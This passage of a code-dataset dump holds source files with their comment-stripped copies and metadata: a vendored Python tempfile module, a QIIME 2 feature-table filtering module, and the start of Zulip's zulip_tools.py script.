def close(self, unlink=_os.unlink):
if not self.close_called and self.file is not None:
self.close_called = True
try:
self.file.close()
finally:
if self.delete:
unlink(self.name)
# Need to ensure the file is deleted on __del__
def __del__(self):
self.close()
else:
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
class _TemporaryFileWrapper:
"""Temporary file wrapper
This class provides a wrapper around files opened for
temporary use. In particular, it seeks to automatically
remove the file when it is no longer needed.
"""
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
self._closer = _TemporaryFileCloser(file, name, delete)
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if hasattr(a, '__call__'):
func = a
@_functools.wraps(func)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
# Avoid closing the file as long as the wrapper is alive,
# see issue #18879.
func_wrapper._closer = self._closer
a = func_wrapper
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
def close(self):
"""
Close the temporary file, possibly deleting it.
"""
self._closer.close()
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
# Don't return iter(self.file), but yield from it to avoid closing
# file as long as it's being used as iterator (see issue #23700). We
# can't use 'yield from' here because iter(file) returns the file
# object itself, which has a close method, and thus the file would get
# closed when the generator is finalized, due to PEP380 semantics.
for line in self.file:
yield line
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None, delete=True):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
'delete' -- whether the file is deleted on close (default True).
The file is created as mkstemp() would do it.
Returns an object with a file-like interface; the name of the file
is accessible as file.name. The file will be automatically deleted
when it is closed unless the 'delete' argument is set to False.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if (_os.name == 'nt' or _os.name == 'uwp_os') and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
except Exception:
_os.close(fd)
raise
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
# Is the O_TMPFILE flag available and does it work?
# The flag is set to False if os.open(dir, os.O_TMPFILE) raises an
# IsADirectoryError exception
_O_TMPFILE_WORKS = hasattr(_os, 'O_TMPFILE')
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
global _O_TMPFILE_WORKS
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
if _O_TMPFILE_WORKS:
try:
flags2 = (flags | _os.O_TMPFILE) & ~_os.O_CREAT
fd = _os.open(dir, flags2, 0o600)
except IsADirectoryError:
# Linux kernel older than 3.11 ignores O_TMPFILE flag.
# Set flag to False to not try again.
_O_TMPFILE_WORKS = False
except OSError:
# The filesystem of the directory does not support O_TMPFILE.
# For example, OSError(95, 'Operation not supported').
pass
else:
try:
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
# Fallback to _mkstemp_inner().
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
"""Temporary file wrapper, specialized to switch from BytesIO
or StringIO to a real file when it exceeds a certain size or
when a fileno is needed.
"""
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix=None, prefix=None, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
# get double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# The method caching trick from NamedTemporaryFile
# won't work here, because _file may change from a
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix=None, prefix=None, dir=None):
self.name = mkdtemp(suffix, prefix, dir)
self._finalizer = _weakref.finalize(
self, self._cleanup, self.name,
warn_message="Implicitly cleaning up {!r}".format(self))
@classmethod
def _cleanup(cls, name, warn_message):
_shutil.rmtree(name)
_warnings.warn(warn_message, ResourceWarning)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def __exit__(self, exc, value, tb):
self.cleanup()
def cleanup(self):
if self._finalizer.detach():
_shutil.rmtree(self.name)
| 32.665006
| 90
| 0.613534
|
__all__ = [
"NamedTemporaryFile", "TemporaryFile", "SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", "mktemp", "TMP_MAX", "gettempprefix", "tempdir", "gettempdir",
"gettempprefixb", "gettempdirb",
]
import functools as _functools
import warnings as _warnings
import io as _io
import os as _os
import shutil as _shutil
import errno as _errno
from random import Random as _Random
import weakref as _weakref
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
template = "tmp"
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
def _stat(fn):
fd = _os.open(fn, _os.O_RDONLY)
_os.close(fd)
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
def _infer_return_type(*args):
return_type = None
for arg in args:
if arg is None:
continue
if isinstance(arg, bytes):
if return_type is str:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = bytes
else:
if return_type is bytes:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = str
if return_type is None:
return str # tempfile APIs return a str by default.
return return_type
def _sanitize_params(prefix, suffix, dir):
output_type = _infer_return_type(prefix, suffix, dir)
if suffix is None:
suffix = output_type()
if prefix is None:
if output_type is str:
prefix = template
else:
prefix = _os.fsencode(template)
if dir is None:
if output_type is str:
dir = gettempdir()
else:
dir = gettempdirb()
return prefix, suffix, dir, output_type
class _RandomNameSequence:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in range(8)]
return ''.join(letters)
def _candidate_tempdir_list():
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
elif _os.name != 'uwp_os':
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.abspath(dir)
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
break # no point trying more names in this directory
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags, output_type):
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return (fd, _os.path.abspath(file))
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
return template
def gettempprefixb():
return _os.fsencode(gettempprefix())
tempdir = None
def gettempdir():
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def gettempdirb():
return _os.fsencode(gettempdir())
def mkstemp(suffix=None, prefix=None, dir=None, text=False):
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags, output_type)
def mkdtemp(suffix=None, prefix=None, dir=None):
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileCloser:
file = None # Set here since __del__ checks it
close_called = False
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
# NT provides delete-on-close as a primitive, so we don't need
if _os.name != 'nt' and _os.name != 'uwp_os':
# shutdown when the module-level "os" is None'd out. Note
# __del__ is called.
def close(self, unlink=_os.unlink):
if not self.close_called and self.file is not None:
self.close_called = True
try:
self.file.close()
finally:
if self.delete:
unlink(self.name)
# Need to ensure the file is deleted on __del__
def __del__(self):
self.close()
else:
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
class _TemporaryFileWrapper:
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
self._closer = _TemporaryFileCloser(file, name, delete)
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if hasattr(a, '__call__'):
func = a
@_functools.wraps(func)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
# Avoid closing the file as long as the wrapper is alive,
# see issue #18879.
func_wrapper._closer = self._closer
a = func_wrapper
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
def close(self):
self._closer.close()
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
# file as long as it's being used as iterator (see issue #23700). We
# object itself, which has a close method, and thus the file would get
# closed when the generator is finalized, due to PEP380 semantics.
for line in self.file:
yield line
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None, delete=True):
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if (_os.name == 'nt' or _os.name == 'uwp_os') and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
except Exception:
_os.close(fd)
raise
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
# Is the O_TMPFILE flag available and does it work?
# The flag is set to False if os.open(dir, os.O_TMPFILE) raises an
# IsADirectoryError exception
_O_TMPFILE_WORKS = hasattr(_os, 'O_TMPFILE')
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
global _O_TMPFILE_WORKS
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
if _O_TMPFILE_WORKS:
try:
flags2 = (flags | _os.O_TMPFILE) & ~_os.O_CREAT
fd = _os.open(dir, flags2, 0o600)
except IsADirectoryError:
# Linux kernel older than 3.11 ignores O_TMPFILE flag.
# Set flag to False to not try again.
_O_TMPFILE_WORKS = False
except OSError:
# The filesystem of the directory does not support O_TMPFILE.
# For example, OSError(95, 'Operation not supported').
pass
else:
try:
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
# Fallback to _mkstemp_inner().
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix=None, prefix=None, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
def __init__(self, suffix=None, prefix=None, dir=None):
self.name = mkdtemp(suffix, prefix, dir)
self._finalizer = _weakref.finalize(
self, self._cleanup, self.name,
warn_message="Implicitly cleaning up {!r}".format(self))
@classmethod
def _cleanup(cls, name, warn_message):
_shutil.rmtree(name)
_warnings.warn(warn_message, ResourceWarning)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def __exit__(self, exc, value, tb):
self.cleanup()
def cleanup(self):
if self._finalizer.detach():
_shutil.rmtree(self.name)
| true
| true
|
f707cbfb17d3f0aaabf8186795d08e5f8861d69f
| 4,763
|
py
|
Python
|
q2_feature_table/_filter.py
|
andrewsanchez/q2-feature-table
|
9ed6160adad45445ec054e5ce034a3b3ba25a9b4
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/_filter.py
|
andrewsanchez/q2-feature-table
|
9ed6160adad45445ec054e5ce034a3b3ba25a9b4
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/_filter.py
|
andrewsanchez/q2-feature-table
|
9ed6160adad45445ec054e5ce034a3b3ba25a9b4
|
[
"BSD-3-Clause"
] | null | null | null |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import biom
import qiime2
import numpy as np
import pandas as pd
def _get_biom_filter_function(ids_to_keep, min_frequency, max_frequency,
min_nonzero, max_nonzero):
ids_to_keep = set(ids_to_keep)
if max_frequency is None:
max_frequency = np.inf
if max_nonzero is None:
max_nonzero = np.inf
def f(data_vector, id_, metadata):
return (id_ in ids_to_keep) and \
(min_frequency <= data_vector.sum() <= max_frequency) and \
(min_nonzero <= (data_vector > 0).sum() <= max_nonzero)
return f
_other_axis_map = {'sample': 'observation', 'observation': 'sample'}
def _filter_table(table, min_frequency, max_frequency, min_nonzero,
max_nonzero, metadata, where, axis, exclude_ids=False):
if min_frequency == 0 and max_frequency is None and min_nonzero == 0 and\
max_nonzero is None and metadata is None and where is None and\
exclude_ids is False:
raise ValueError("No filtering was requested.")
if metadata is None and where is not None:
raise ValueError("Metadata must be provided if 'where' is "
"specified.")
if metadata is None and exclude_ids is True:
raise ValueError("Metadata must be provided if 'exclude_ids' "
"is True.")
if metadata is not None:
ids_to_keep = metadata.get_ids(where=where)
else:
ids_to_keep = table.ids(axis=axis)
if exclude_ids is True:
ids_to_keep = set(table.ids(axis=axis)) - set(ids_to_keep)
filter_fn1 = _get_biom_filter_function(
ids_to_keep, min_frequency, max_frequency, min_nonzero, max_nonzero)
table.filter(filter_fn1, axis=axis, inplace=True)
# filter on the opposite axis to remove any entities that now have a
# frequency of zero
filter_fn2 = _get_biom_filter_function(
ids_to_keep=table.ids(axis=_other_axis_map[axis]), min_frequency=0,
max_frequency=None, min_nonzero=1, max_nonzero=None)
table.filter(filter_fn2, axis=_other_axis_map[axis], inplace=True)
def filter_samples(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_features: int = 0,
max_features: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_features,
max_nonzero=max_features, metadata=metadata,
where=where, axis='sample', exclude_ids=exclude_ids)
return table
def filter_features(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_samples: int = 0,
max_samples: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_samples,
max_nonzero=max_samples, metadata=metadata,
where=where, axis='observation', exclude_ids=exclude_ids)
return table
def filter_seqs(data: pd.Series, table: biom.Table = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False) -> pd.Series:
if table is not None and metadata is not None:
raise ValueError('Filtering with metadata and filtering with a table '
'are mutually exclusive.')
elif table is None and metadata is None:
raise ValueError('No filtering requested. Must provide either table '
'or metadata.')
elif table is not None:
ids_to_keep = table.ids(axis='observation')
else:
# Note, no need to check for missing feature IDs in the metadata,
# because that is basically the point of this method.
ids_to_keep = metadata.get_ids(where=where)
if exclude_ids is True:
ids_to_keep = set(data.index) - set(ids_to_keep)
filtered = data[data.index.isin(ids_to_keep)]
if filtered.empty is True:
raise ValueError('All features were filtered out of the data.')
return filtered
| 41.780702
| 78
| 0.622297
|
import biom
import qiime2
import numpy as np
import pandas as pd
def _get_biom_filter_function(ids_to_keep, min_frequency, max_frequency,
min_nonzero, max_nonzero):
ids_to_keep = set(ids_to_keep)
if max_frequency is None:
max_frequency = np.inf
if max_nonzero is None:
max_nonzero = np.inf
def f(data_vector, id_, metadata):
return (id_ in ids_to_keep) and \
(min_frequency <= data_vector.sum() <= max_frequency) and \
(min_nonzero <= (data_vector > 0).sum() <= max_nonzero)
return f
_other_axis_map = {'sample': 'observation', 'observation': 'sample'}
def _filter_table(table, min_frequency, max_frequency, min_nonzero,
max_nonzero, metadata, where, axis, exclude_ids=False):
if min_frequency == 0 and max_frequency is None and min_nonzero == 0 and\
max_nonzero is None and metadata is None and where is None and\
exclude_ids is False:
raise ValueError("No filtering was requested.")
if metadata is None and where is not None:
raise ValueError("Metadata must be provided if 'where' is "
"specified.")
if metadata is None and exclude_ids is True:
raise ValueError("Metadata must be provided if 'exclude_ids' "
"is True.")
if metadata is not None:
ids_to_keep = metadata.get_ids(where=where)
else:
ids_to_keep = table.ids(axis=axis)
if exclude_ids is True:
ids_to_keep = set(table.ids(axis=axis)) - set(ids_to_keep)
filter_fn1 = _get_biom_filter_function(
ids_to_keep, min_frequency, max_frequency, min_nonzero, max_nonzero)
table.filter(filter_fn1, axis=axis, inplace=True)
filter_fn2 = _get_biom_filter_function(
ids_to_keep=table.ids(axis=_other_axis_map[axis]), min_frequency=0,
max_frequency=None, min_nonzero=1, max_nonzero=None)
table.filter(filter_fn2, axis=_other_axis_map[axis], inplace=True)
def filter_samples(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_features: int = 0,
max_features: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_features,
max_nonzero=max_features, metadata=metadata,
where=where, axis='sample', exclude_ids=exclude_ids)
return table
def filter_features(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_samples: int = 0,
max_samples: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_samples,
max_nonzero=max_samples, metadata=metadata,
where=where, axis='observation', exclude_ids=exclude_ids)
return table
def filter_seqs(data: pd.Series, table: biom.Table = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False) -> pd.Series:
if table is not None and metadata is not None:
raise ValueError('Filtering with metadata and filtering with a table '
'are mutually exclusive.')
elif table is None and metadata is None:
raise ValueError('No filtering requested. Must provide either table '
'or metadata.')
elif table is not None:
ids_to_keep = table.ids(axis='observation')
else:
ids_to_keep = metadata.get_ids(where=where)
if exclude_ids is True:
ids_to_keep = set(data.index) - set(ids_to_keep)
filtered = data[data.index.isin(ids_to_keep)]
if filtered.empty is True:
raise ValueError('All features were filtered out of the data.')
return filtered
| true
| true
|
f707cc59db04834474887b8af1640934d57e50d9
| 19,428
|
py
|
Python
|
scripts/lib/zulip_tools.py
|
shubhamgupta2956/zulip
|
77091c7b17a0a37392eaa8765d46e3c673da081a
|
[
"Apache-2.0"
] | 2
|
2020-09-12T13:36:15.000Z
|
2021-06-28T18:10:41.000Z
|
scripts/lib/zulip_tools.py
|
shubhamgupta2956/zulip
|
77091c7b17a0a37392eaa8765d46e3c673da081a
|
[
"Apache-2.0"
] | null | null | null |
scripts/lib/zulip_tools.py
|
shubhamgupta2956/zulip
|
77091c7b17a0a37392eaa8765d46e3c673da081a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import configparser
import datetime
import functools
import hashlib
import json
import logging
import os
import pwd
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import uuid
from typing import Any, Dict, List, Sequence, Set
from urllib.parse import SplitResult
DEPLOYMENTS_DIR = "/home/zulip/deployments"
LOCK_DIR = os.path.join(DEPLOYMENTS_DIR, "lock")
TIMESTAMP_FORMAT = '%Y-%m-%d-%H-%M-%S'
# Color codes
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BLACKONYELLOW = '\x1b[0;30;43m'
WHITEONRED = '\x1b[0;37;41m'
BOLDRED = '\x1B[1;31m'
GREEN = '\x1b[32m'
YELLOW = '\x1b[33m'
BLUE = '\x1b[34m'
MAGENTA = '\x1b[35m'
CYAN = '\x1b[36m'
def overwrite_symlink(src: str, dst: str) -> None:
dir, base = os.path.split(dst)
while True:
# Note: creating a temporary filename like this is not generally
# secure. It’s fine in this case because os.symlink refuses to
# overwrite an existing target; we handle the error and try again.
tmp = os.path.join(dir, ".{}.{:010x}".format(base, random.randrange(1 << 40)))
try:
os.symlink(src, tmp)
except FileExistsError:
continue
break
try:
os.rename(tmp, dst)
except Exception:
os.remove(tmp)
raise
def parse_cache_script_args(description: str) -> argparse.Namespace:
# Keep this in sync with clean_unused_caches in provision_inner.py
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--threshold", dest="threshold_days", type=int, default=14,
metavar="<days>", help="Any cache which is not in "
"use by a deployment not older than threshold days(current "
"installation in dev) and older than threshold days will be "
"deleted. (defaults to 14)")
parser.add_argument(
